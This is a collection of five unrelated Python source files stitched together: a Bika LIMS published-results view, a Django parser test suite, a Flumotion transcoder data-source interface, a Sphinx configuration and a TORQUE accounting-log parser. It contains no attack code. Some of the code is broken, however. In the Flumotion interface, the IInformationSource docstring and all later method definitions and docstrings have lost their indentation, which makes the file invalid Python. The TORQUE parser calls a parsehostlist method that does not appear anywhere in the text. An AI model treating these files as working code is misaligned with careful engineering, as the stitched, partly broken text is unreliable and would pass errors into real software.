rockfruit/bika.lims
|
bika/lims/browser/analysisrequest/published_results.py
|
# This file is part of Bika LIMS
#
# Copyright 2011-2016 by it's authors.
# Some rights reserved. See LICENSE.txt, AUTHORS.txt.
from AccessControl import getSecurityManager
from Products.CMFPlone.utils import safe_unicode
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from bika.lims.browser.bika_listing import BikaListingView
from bika.lims.content.analysisrequest import schema as AnalysisRequestSchema
from bika.lims.permissions import *
from bika.lims.utils import to_utf8
from bika.lims.workflow import doActionFor
from DateTime import DateTime
from Products.Archetypes import PloneMessageFactory as PMF
from Products.CMFCore.utils import getToolByName
import plone
class AnalysisRequestPublishedResults(BikaListingView):
    """ View of published results
        Prints the list of pdf files with each publication dates, the user
        responsible of that publication, the emails of the addressees (and/or)
        client contact names with the publication mode used (pdf, email, etc.)
    """
    # I took IViewView away, because transitions selected in the edit-bar
    # cause errors due to wrong context, when invoked from this view, and I
    # don't know why.
    # implements(IViewView)

    def __init__(self, context, request):
        """Configure the listing: catalog, columns and review states."""
        super(AnalysisRequestPublishedResults, self).__init__(context, request)
        self.catalog = "bika_catalog"
        self.contentFilter = {'portal_type': 'ARReport',
                              'sort_order': 'reverse'}
        self.context_actions = {}
        self.show_select_column = True
        self.show_workflow_action_buttons = False
        self.form_id = 'published_results'
        self.icon = self.portal_url + "/++resource++bika.lims.images/report_big.png"
        self.title = self.context.translate(_("Published results"))
        self.columns = {
            'Title': {'title': _('File')},
            'FileSize': {'title': _('Size')},
            'Date': {'title': _('Date')},
            'PublishedBy': {'title': _('Published By')},
            'Recipients': {'title': _('Recipients')},
        }
        self.review_states = [
            {'id': 'default',
             'title': 'All',
             'contentFilter': {},
             'columns': ['Title',
                         'FileSize',
                         'Date',
                         'PublishedBy',
                         'Recipients']},
        ]

    def __call__(self):
        """Render the listing, adding warning/info messages for retracted
        or retraction-generated Analysis Requests."""
        ar = self.context
        workflow = getToolByName(ar, 'portal_workflow')
        # If is a retracted AR, show the link to child AR and show a warn msg
        if workflow.getInfoFor(ar, 'review_state') == 'invalid':
            childar = hasattr(ar, 'getChildAnalysisRequest') \
                and ar.getChildAnalysisRequest() or None
            childid = childar and childar.getRequestID() or None
            message = _('This Analysis Request has been withdrawn and is '
                        'shown for trace-ability purposes only. Retest: '
                        '${retest_child_id}.',
                        mapping={'retest_child_id': safe_unicode(childid) or ''})
            self.context.plone_utils.addPortalMessage(
                self.context.translate(message), 'warning')
        # If is an AR automatically generated due to a Retraction, show it's
        # parent AR information
        if hasattr(ar, 'getParentAnalysisRequest') \
                and ar.getParentAnalysisRequest():
            par = ar.getParentAnalysisRequest()
            message = _('This Analysis Request has been '
                        'generated automatically due to '
                        'the retraction of the Analysis '
                        'Request ${retracted_request_id}.',
                        mapping={'retracted_request_id': par.getRequestID()})
            self.context.plone_utils.addPortalMessage(
                self.context.translate(message), 'info')
        template = BikaListingView.__call__(self)
        return template

    def contentsMethod(self, contentFilter):
        """
        ARReport objects associated to the current Analysis request.
        If the user is not a Manager or LabManager or Client, no items are
        displayed.
        """
        allowedroles = ['Manager', 'LabManager', 'Client', 'LabClerk']
        pm = getToolByName(self.context, "portal_membership")
        member = pm.getAuthenticatedMember()
        roles = member.getRoles()
        allowed = [a for a in allowedroles if a in roles]
        return self.context.objectValues('ARReport') if allowed else []

    def folderitem(self, obj, item, index):
        """Fill one listing row for an ARReport: download link, size in Kb,
        publication date, publisher and recipients."""
        obj_url = obj.absolute_url()
        pdf = obj.getPdf()
        filesize = 0
        title = _('Download')
        anchor = "<a href='%s/at_download/Pdf'>%s</a>" % \
                 (obj_url, _("Download"))
        try:
            filesize = pdf.get_size()
            filesize = filesize / 1024 if filesize > 0 else 0
        except Exception:
            # POSKeyError: 'No blob file'
            # Show the record, but not the link
            # (narrowed from a bare except so SystemExit etc. still propagate)
            title = _('Not available')
            anchor = title
        item['Title'] = title
        item['FileSize'] = '%sKb' % filesize
        fmt_date = self.ulocalized_time(obj.created(), long_format=1)
        item['Date'] = fmt_date
        item['PublishedBy'] = self.user_fullname(obj.Creator())
        recip = []
        for recipient in obj.getRecipients():
            email = recipient['EmailAddress']
            val = recipient['Fullname']
            if email:
                # link the name to a mailto: when an address is known
                val = "<a href='mailto:%s'>%s</a>" % (email, val)
            recip.append(val)
        item['replace']['Recipients'] = ', '.join(recip)
        item['replace']['Title'] = anchor
        return item
|
tuxite/pharmaship
|
pharmaship/tests/inventory/test_parsers_rescue_bag.py
|
# -*- coding: utf-8; -*-
"""Test suite for `parsers.rescue_bag` subpackage."""
import json
from pathlib import Path
from django.test import TestCase
from django.core.management import call_command
from django.conf import settings
from django.db.models.fields.files import ImageFieldFile
from cerberus import Validator, TypeDefinition
from pharmaship.core.utils import log
from pharmaship.gui.view import GlobalParameters
from pharmaship.inventory import models
from pharmaship.inventory.parsers import rescue_bag
class ParserMethodTestCase(TestCase):
    """Tests for `inventory.parsers.rescue_bag` methods.

    The repeated cerberus boilerplate (schema loading, `image_field`
    registration, error logging, integer-keyed-dict check) lives in
    private helpers so each test reads as: call the parser, validate.
    """

    def setUp(self):  # noqa: D102
        self.assets = Path(settings.BASE_DIR) / "tests/inventory/assets"
        call_command(
            "loaddata",
            self.assets / "parsers" / "rescue_bag.yaml"
        )
        self.params = GlobalParameters()

    # -- helpers ----------------------------------------------------------

    def _validator(self, schema_name):
        """Build a cerberus Validator from a rescue_bag JSON schema file."""
        schema_path = settings.VALIDATOR_PATH.joinpath(
            "parsers",
            "rescue_bag",
            schema_name
        )
        return Validator(json.loads(schema_path.read_text()))

    def _register_image_field_type(self):
        """Teach cerberus to accept Django ImageFieldFile values."""
        Validator.types_mapping['image_field'] = TypeDefinition(
            name='image_field',
            included_types=(ImageFieldFile,),
            excluded_types=()
        )

    def _assert_valid(self, validator, document):
        """Validate `document`, logging the errors and document on failure."""
        result = validator.validate(document)
        if not result:
            log.error(validator.errors)
            log.debug(document)
        self.assertTrue(result)

    def _assert_all_items_valid(self, output):
        """Every value of `output` matches the single_item schema and every
        key is an integer."""
        self._register_image_field_type()
        validator = self._validator("single_item.json")
        for key in output:
            self._assert_valid(validator, output[key])
        int_keys_schema = {
            "data": {
                "type": "dict",
                "keysrules": {
                    "type": "integer"
                }
            }
        }
        self.assertTrue(Validator(int_keys_schema).validate({"data": output}))

    # -- tests ------------------------------------------------------------

    def test_get_required(self):
        output = rescue_bag.get_required(self.params)
        self._assert_valid(self._validator("get_required.json"), output)

    def test_create_molecule(self):
        required = rescue_bag.get_required(self.params)
        molecule = models.Molecule.objects.get(id=3)
        output = rescue_bag.create_molecule(molecule, required["molecules"])
        self._register_image_field_type()
        self._assert_valid(self._validator("single_item.json"), output)

    def test_create_equipment(self):
        required = rescue_bag.get_required(self.params)
        equipment = models.Equipment.objects.get(id=2)
        output = rescue_bag.create_equipment(equipment, required["equipments"])
        self._register_image_field_type()
        self._assert_valid(self._validator("single_item.json"), output)

    def test_create_molecules(self):
        required = rescue_bag.get_required(self.params)
        output = rescue_bag.create_molecules(
            required["molecules"].keys(),
            required["molecules"]
        )
        self._assert_all_items_valid(output)

    def test_create_equipments(self):
        required = rescue_bag.get_required(self.params)
        output = rescue_bag.create_equipments(
            required["equipments"].keys(),
            required["equipments"]
        )
        self._assert_all_items_valid(output)

    def test_get_transactions(self):
        validator = self._validator("get_transactions.json")
        # Test for medicines
        content_type = self.params.content_types["medicine"]
        items = models.Medicine.objects.filter(used=False).values_list("id", flat=True)
        output = rescue_bag.get_transactions(content_type, items)
        self._assert_valid(validator, {"data": output})
        # Test for articles
        content_type = self.params.content_types["article"]
        items = models.Article.objects.filter(used=False).values_list("id", flat=True)
        output = rescue_bag.get_transactions(content_type, items)
        self._assert_valid(validator, {"data": output})

    def test_get_medicines(self):
        required = rescue_bag.get_required(self.params)
        output = rescue_bag.get_medicines(
            self.params,
            required["molecules"],
            [100, ]
        )
        self._assert_all_items_valid(output)

    def test_get_articles(self):
        required = rescue_bag.get_required(self.params)
        output = rescue_bag.get_articles(
            self.params,
            required["equipments"],
            [100, ]
        )
        self._assert_all_items_valid(output)

    def test_merge_bags(self):
        required = rescue_bag.get_required(self.params)
        equipments = rescue_bag.get_articles(
            self.params,
            required["equipments"],
            [110, 111]
        )
        molecules = rescue_bag.get_medicines(
            self.params,
            required["molecules"],
            [110, 111]
        )
        bags = models.RescueBag.objects.all()
        output = rescue_bag.merge_bags(bags, molecules, equipments)
        self._register_image_field_type()
        self._assert_valid(self._validator("merged_bags.json"), {"data": output})

    def test_parser(self):
        output = rescue_bag.parser(self.params)
        self._register_image_field_type()
        self._assert_valid(self._validator("rescue_bag.json"), {"data": output})
|
osiloke/Flumotion-Transcoder
|
flumotion/transcoder/admin/datasource/datasource.py
|
# vi:si:et:sw=4:sts=4:ts=4
# Flumotion - a streaming media server
# Copyright (C) 2004,2005,2006,2007,2008,2009 Fluendo, S.L.
# Copyright (C) 2010,2011 Flumotion Services, S.A.
# All rights reserved.
#
# This file may be distributed and/or modified under the terms of
# the GNU Lesser General Public License version 2.1 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.LGPL" in the source distribution for more information.
#
# Headers in this file shall remain intact.
from zope.interface import Interface
from flumotion.transcoder import errors
class DataSourceError(errors.TranscoderError):
    """Base class for every error raised by a data source."""
    # The subclasses below previously redefined __init__ only to delegate
    # unchanged to the parent; that boilerplate has been removed — the
    # inherited constructor is identical in behavior.


class InitializationError(DataSourceError):
    """A data source failed to initialize."""


class StoringError(DataSourceError):
    """A container object could not be stored."""


class DeletionError(DataSourceError):
    """A container object could not be deleted."""


class ResetError(DataSourceError):
    """A container object could not be reset to its stored values."""


class RetrievalError(DataSourceError):
    """Data could not be retrieved from the source."""


class DataNotFoundError(RetrievalError):
    """The requested data does not exist in the source."""


class ReadOnlyDataError(StoringError):
    """Attempted to store data that is read-only."""


class DuplicatedDataError(StoringError):
    """Storing would create a duplicate of existing data."""


class DataDependencyError(StoringError):
    """Storing or deleting would violate a dependency between data."""
class IDataSource(Interface):
    """
    The data source allows the retrieval, creation, insertion and deletion
    of "container" objects in an abstract source.
    The containers themselves are unspecified, apart from their fields,
    the equality operator, and an identifier field that uniquely
    and persistently identifies a "record" and that is None when not stored.
    The equality operator compares whether two objects represent the same
    element in the source, not whether they have the same field values.
    Two new elements that have not been stored in the source are never equal.
    If an element is retrieved and modified more than one time before
    being stored, all modifications but the last stored one are lost
    without warning. THERE IS NO CONCURRENT MODIFICATION PROTECTION.
    """

    def initialize(self):
        """
        Returns a deferred.
        Initializes the data source.
        """

    def store(self, *data):
        """
        Returns a deferred.
        Stores all the specified container objects.
        The objects must have been created by the store.
        All the objects are stored atomically if the
        store supports it.
        """

    def reset(self, *data):
        """
        Returns a deferred.
        Resets the values of the specified container objects
        to their original values from the data source.
        If a specified container was never stored,
        its values are not changed.
        """

    def delete(self, *data):
        """
        Returns a deferred.
        Deletes all the specified container objects.
        The objects must have been created by the store.
        All the objects are deleted atomically if the
        store supports it.
        Deletion is not an operation that can be
        reversed by calling reset.
        """
class IReportsSource(IDataSource):
    """
    The reports source holds the results of transcoding activities.
    """

    def newTranscodeReport(self):
        """
        Creates a new transcoding report container object.
        """
class IInformationSource(IDataSource):
"""
The information source holds all the information that are not held
by the reports source. This includes customers, profiles,
notifications, etc.
"""
def waitReady(self, timeout=None):
"""
Returns a deferred that is called when the source
is ready to provide data, if the source fail to initialize
or if the specified timeout is reached.
"""
def retrieveDefaults(self):
"""
Returns a deferred.
The result on success is a "container" object
with the following fields:
outputMediaTemplate (str) can be None
outputThumbTemplate (str) can be None
linkFileTemplate (str) can be None
configFileTemplate (str) can be None
reportFileTemplate (str) can be None
accessForceGroup (str) can be None
accessForceUser (str) can be None
accessForceDirMode (int) can be None
accessForceFileMode (int) can be None
monitoringPeriod (int) can be None:
Gives the default period used to monitor the filesystem.
processPriority (int) can be None:
Gives the default process priority for the transcoding job
transcodingPriority (int) can be None:
Gives the default scheduler priority of the transcoding jobs.
transcodingTimeout (int) can be None:
Gives the default timeout of the transcoding jobs.
postprocessTimeout (int) can be None:
Gives the default timeout of the post-processing.
preprocessTimeout (int) can be None:
Gives the default timeout of the pre-processing.
mailSubjectTemplate (str) can be None:
Gives the default template for the mail notifications subject.
mailBodyTemplate (str) can be None:
Gives the default template for the mail notifications body.
mailTimeout (int) can be None:
Gives the default timeout for mail notifications.
mailRetryCount (int) can be None:
Gives the default retry count for mail notifications.
mailRetrySleep (int) can be None:
Gives the default time between retry for mail notifications.
HTTPRequestTimeout (int) can be None:
Gives the default timeout for HTTP request notifications.
HTTPRequestRetryCount (int) can be None:
Gives the default retry count for HTTP request notifications.
HTTPRequestRetrySleep (int) can be None:
Gives the default time between retry
for HTTP request notifications.
sqlTimeout (int) can be None:
Gives the default timeout for sql notifications.
sqlRetryCount (int) can be None:
Gives the default retry count for sql notifications.
sqlRetrySleep (int) can be None:
Gives the default time between retry for sql notifications.
"""
def retrieveCustomers(self):
"""
Returns a deferred.
The result on success is a list of "container" objects
with the following fields:
name (str) : The customer name used by the transcoder.
subdir (str) can be None : The sub-directory where the transcoder
root is. If not specified, it will be deduced from the customer name.
Overriding fields:
inputDir (str) can be None
outputDir (str) can be None
failedDir (str) can be None
doneDir (str) can be None
linkDir (str) can be None
workDir (str) can be None
configDir (str) can be None
tempRepDir (str) can be None
failedRepDir (str) can be None
doneRepDir (str) can be None
outputMediaTemplate (str)
outputThumbTemplate (str)
linkFileTemplate (str)
configFileTemplate (str)
reportFileTemplate (str)
linkTemplate (str) can be None
linkURLPrefix (str) can be None
enablePostprocessing (bool) can be None
enablePreprocessing (bool) can be None
enableLinkFiles (bool) can be None
customerPriority (int) can be None
transcodingPriority (int) can be None
processPriority (int) can be None
preprocessCommand (str) can be None
postprocessCommand (str) can be None
preprocesstimeout (int) can be None
postprocessTimeout (int) can be None
transcodingTimeout (int) can be None
monitoringPeriod (int) can be None
accessForceGroup (str) can be None
accessForceUser (str) can be None
accessForceDirMode (int) can be None
accessForceFileMode (int) can be None
"""
def retrieveCustomerInfo(self, custData):
"""
Returns a deferred.
The result on success is a "container" objects
with the following READ ONLY fields:
name (str) can be None
contact (str) can be None
addresses (str[]) maximum size of 3, can be empty
phone (str) can be None
email (str) can be None
"""
def retrieveProfiles(self, custData):
"""
Returns a deferred.
The result on success is a list of "container" objects
with the following fields:
name (str)
subdir (str) can be None
Overriding fields:
inputDir (str) can be None
outputDir (str) can be None
failedDir (str) can be None
doneDir (str) can be None
linkDir (str) can be None
workDir (str) can be None
configDir (str) can be None
tempRepDir (str) can be None
failedRepDir (str) can be None
doneRepDir (str) can be None
outputMediaTemplate (str) can be None
outputThumbTemplate (str) can be None
linkFileTemplate (str) can be None
configFileTemplate (str) can be None
reportFileTemplate (str) can be None
linkTemplate (str) can be None
linkURLPrefix (str) can be None
enablePostprocessing (bool) can be None
enablePreprocessing (bool) can be None
enableLinkFiles (bool) can be None
transcodingPriority (int) can be None
processPriority (int) can be None
preprocessCommand (str) can be None
postprocessCommand (str) can be None
preprocesstimeout (int) can be None
postprocessTimeout (int) can be None
transcodingTimeout (int) can be None
monitoringPeriod (int) can be None
"""
def retrieveTargets(self, profData):
"""
Returns a deferred.
The result on success is a list of "container" objects
with the following fields:
name (str)
extension (str)
subdir (str) can be None
Overriding fields:
linkTemplate (str) can be None
linkURLPrefix (str) can be None
outputDir (str) can be None
linkDir (str) can be None
workDir (str) can be None
outputFileTemplate (str) can be None
linkFileTemplate (str) can be None
enablePostprocessing (bool) can be None
enableLinkFiles (bool) can be None
postprocessCommand (str) can be None
postprocessTimeout (int) can be None
"""
def retrieveTargetConfig(self, targData):
"""
Returns a deferred.
The result on success is a "container" objects
that depend of the target type.
For all:
type (TargetTypeEnum)
For an Audio and Audio/Video targets, it has the following fields:
muxer (str)
audioEncoder (str)
audioResampler (str)
audioRate (str)
audioChannels (str)
For a video and Audio/Video targets, it has the following fields:
muxer (str)
videoEncoder (str)
videoWidth (int)
videoHeight (int)
videoMaxWidth (int)
videoMaxHeight (int)
videoWidthMultiple (int)
videoHeightMultiple (int)
videoPAR (int[2])
videoFramerate (int[2])
videoScaleMethod (VideoScaleMethodEnum)
For Audio/Video targets, it has the following additional fields:
tolerance (AudioVideoToleranceEnum)
For a Thumbnails targets, it has the following fields:
thumbsWidth (int)
thumbsHeight (int)
periodValue (int)
periodUnit (PeriodUnitEnum)
maxCount (int)
format (ThumbOutputTypeEnum)
ensureOne (bool)
"""
def retrieveGlobalNotifications(self):
    """
    Retrieve the notifications that apply globally (to all customers).

    Returns a deferred.
    The result on success is a list of "container" objects
    with the following fields, depending on the notification type:
    For all:
        type (NotificationTypeEnum)
        triggers (set of NotificationTriggerEnum)
        timeout (int) can be None
        retryMax (int) can be None
        retrySleep (int) can be None
    For type == NotificationTypeEnum.email:
        subjectTemplate (str) can be None
        bodyTemplate (str) can be None
        attachments (set of DocumentTypeEnum)
        recipients: dict with MailAddressTypeEnum as keys
                    and values that are lists of (name, email) tuples,
                    where name can be None
    For type == NotificationTypeEnum.http_request:
        urlTemplate (str)
    For type == NotificationTypeEnum.sql:
        databaseURI (str)
        sqlTemplate (str)
    """
def retrieveCustomerNotifications(self, custData):
    """
    Retrieve the notifications of the specified customer.

    Returns a deferred.
    The result on success is a list of the customer's notifications.
    See retrieveGlobalNotifications for the result specification.
    """
def retrieveProfileNotifications(self, profData):
    """
    Retrieve the notifications of the specified profile.

    Returns a deferred.
    The result on success is a list of the profile's notifications.
    See retrieveGlobalNotifications for the result specification.
    """
def retrieveTargetNotifications(self, targData):
    """
    Retrieve the notifications of the specified target.

    Returns a deferred.
    The result on success is a list of the target's notifications.
    See retrieveGlobalNotifications for the result specification.
    """
def retrieveActivities(self, type, states=None):
    """
    Retrieve the activities with the specified type whose state is in
    the given list of states (all states if 'states' is None or empty).

    NOTE: the parameter name 'type' shadows the builtin, but is kept
    unchanged for interface compatibility.

    Returns a deferred.
    The result on success is a list of "container" objects
    with the following fields:
        type (ActivityTypeEnum)
        subtype (TranscodingTypeEnum or NotificationTypeEnum)
        state (ActivityStateEnum)
        startTime (datetime)
        lastTime (datetime)
        customerIdentifier (str)
        profileIdentifier (str)
        targetIdentifier (str)
    For type == transcoding, reference is a data container:
        inputRelPath (str)
    For type == notification:
        trigger (NotificationTriggerEnum)
        timeout (int)
        retryCount (int)
        retryMax (int)
        retrySleep (int)
        data (dict)
    """
def newActivity(self, type, subtype):
    """
    Create a new activity container of the specified type and subtype.

    NOTE: the parameter name 'type' shadows the builtin, but is kept
    unchanged for interface compatibility.
    """
def newCustomer(self, custId):
    """
    Create a new customer container.

    It is not added to the store; it should be filled in and then
    the store method should be called.
    """
def newProfile(self, custData):
    """
    Create a new profile container for the specified customer.

    It is not added to the store; it should be filled in and then
    the store method should be called.
    """
def newNotification(self, type, data):
    """
    Create a new notification container of the specified type
    (NotificationTypeEnum).

    The specified data must be customer data, profile data,
    target data or None; it determines the notification's scope:
        None: applies to all customers' transcoding
        Customer data: applies to all profiles' transcoding
            of the specified customer
        Profile data: applies to a specific customer's
            profile transcoding
        Target data: applies to a specific target of a profile
    It is not added to the store; it should be filled in and then
    the store method should be called.
    """
def newTarget(self, profData):
    """
    Create a new target container object for the specified profile.
    """
def newTargetConfig(self, targData):
    """
    Create a new target config container object for the specified target.
    """
def newReport(self, profData):
    """
    Create a new report container object for the specified profile.
    """
def newTargetReport(self, repData):
    """
    Create a new target report container object for the specified report.
    """
def newNotificationReport(self, repData, notifData):
    """
    Create a new notification report container object for the
    specified report and notification.
    """
|
jsafrane/openlmi-storage
|
doc/admin/conf.py
|
# -*- coding: utf-8 -*-
#
# OpenLMI Storage Provider documentation build configuration file, created by
# sphinx-quickstart on Mon Jun 4 10:22:18 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../providers'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.viewcode']
# NOTE(review): plantuml_* options are set but no plantuml extension is listed
# in 'extensions' above -- presumably it is added elsewhere; verify.
plantuml_output_format='svg'
plantuml_latex_output_format='pdf'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'OpenLMI Storage Provider'
copyright = u'2012-2013, Red Hat Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5.1'
# The full version, including alpha/beta/rc tags.
release = '0.5.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# 'openlmitheme' is a custom theme, found via html_theme_path below.
html_theme = 'openlmitheme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["."]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'OpenLMIStorageProviderdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
    ('index', 'OpenLMIStorageProvider.tex', u'OpenLMI Storage Provider Documentation',
     u'Jan Safranek', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'openlmistorageprovider', u'OpenLMI Storage Provider Documentation',
     [u'Jan Safranek'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    ('index', 'OpenLMIStorageProvider', u'OpenLMI Storage Provider Documentation',
     u'Jan Safranek', 'OpenLMIStorageProvider', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
|
ubccr/tacc_stats
|
pickler/torque_acct.py
|
#!/usr/bin/env python
import os
import codecs
class TorqueAcct(object):
    """Process accounting files from torque.

    Parses per-job end ("E") records from TORQUE accounting logs into plain
    dicts, translating TORQUE field names into generic accounting field
    names via ``fieldmapping``.
    """

    def __init__(self, acct_file, host_name_ext):
        """
        Arguments:
            acct_file     - path to a single accounting file, or a directory
                            tree of accounting files
            host_name_ext - optional suffix appended (with a leading dot)
                            to host names; empty string disables it
        """
        # ncpus/nodes are updated as a side effect of parsing exec_host
        # (see parsehostlist) and copied into each record by parseline.
        self.ncpus = 0
        self.nodes = 0
        # TORQUE record key -> (output field name, conversion callable)
        self.fieldmapping = {
            "account": ["account", str],
            "queue": ["partition", str],
            "session": ["session", str],
            "owner": ["username", str],
            "group": ["group", str],
            "exec_host": ["host_list", self.parsehostlist],
            "jobname": ["job_name", str],
            "user": ["user", str],
            "Exit_status": ["status", int],
            "Error_Path": ["error_path", str],
            "Output_Path": ["output_path", str],
            "ctime": ["submit", int],
            "etime": ["eligible_time", int],
            "qtime": ["queue_time", int],
            "start": ["start_time", int],
            "end": ["end_time", int],
            "Resource_List.ncpus": ["requested_cpus", int],
            "Resource_List.walltime": ["requested_walltime", str],
            "Resource_List.nodect": ["requested_node", int],
            "Resource_List.nodes": ["requested_nodelist", str],
            "Resource_List.procs": ["requested_tasks", str],
            "Resource_List.host": ["requested_host", str],
            "Resource_List.tpn": ["requested_taskspernode", str],
            "Resource_List.neednodes": ["requested_neednodes", str],
            "Resource_List.mem": ["requested_memory", str],
            "Resource_List.pmem": ["requested_vmemory", str],
            "Resource_List.cput": ["requested_cpu_time", str],
            "Resource_List.pvmem": ["requested_pvmem", str],
            "Resource_List.vmem": ["requested_vmem", str],
            "resources_used.cput": ["cpu_time", str],
            "resources_used.mem": ["mem_used", str],
            "resources_used.vmem": ["vmem_used", str],
            "resources_used.walltime": ["wall_time", str]
        }
        self.batch_kind = 'TORQUE'
        self.acct_file = acct_file
        if len(host_name_ext) > 0:
            self.name_ext = '.' + host_name_ext
        else:
            self.name_ext = ""

    def get_host_list_path(self, acct, host_list_dir):
        """Host lists are embedded in the records; nothing to read from disk."""
        return None

    def reader(self, start_time=0, end_time=9223372036854775807, seek=0):
        """The file format of the Torque logs is sufficiently different from
        the others to warrant its own reader implementation.

        Generator yielding one accounting dict per job-end record whose
        end_time falls in [start_time, end_time).
        (The Python-2 'L' suffix was dropped from the default end_time;
        the value is unchanged.)
        """
        filelist = []
        if os.path.isdir(self.acct_file):
            for dir_name, subdir_list, file_list in os.walk(self.acct_file):
                for fname in file_list:
                    # Bug fix: os.walk already yields dir_name rooted at
                    # self.acct_file; re-joining self.acct_file duplicated
                    # the root component in every path.
                    filelist.append(os.path.join(dir_name, fname))
        else:
            filelist = [self.acct_file]
        for fname in filelist:
            # Context manager so each log file is closed promptly
            # (the original leaked the file handle).
            with codecs.open(fname, "r", "utf-8", errors="replace") as filep:
                if seek:
                    filep.seek(seek, os.SEEK_SET)
                for line in filep:
                    acct = self.parseline(line)
                    if acct is not None and start_time <= acct['end_time'] < end_time:
                        yield acct

    def parseline(self, line):
        """Parse one accounting log line ("timestamp;type;jobid;fields").

        Returns a dict for job-end ("E") records, or None for other record
        types and malformed lines.  Raises KeyError/ValueError (after
        printing the offending line) on unknown fields or bad values.
        """
        tokens = line.split(";")
        if len(tokens) < 4:
            return None
        # tokens[0] is the record timestamp (unused here)
        recordtype = tokens[1]
        jobid = tokens[2]
        # The field payload may itself contain ';' -- rejoin the remainder.
        record = ";".join(tokens[3:]).strip()
        if recordtype != "E":
            return None
        parts = jobid.split(".")
        acct = {"local_jobid": int(parts[0]), "id": jobid}
        jobrecs = record.split(" ")
        for jobrec in jobrecs:
            items = jobrec.split("=")
            if len(items) == 2:
                try:
                    mapping = self.fieldmapping[items[0]]
                    acct[mapping[0]] = mapping[1](items[1])
                except (KeyError, ValueError):
                    # Py3 fix: these were Python-2 'print line' statements.
                    # Log the offending line, then re-raise the original error.
                    print(line)
                    raise
        acct['ncpus'] = self.ncpus
        acct['nodes'] = self.nodes
        return acct

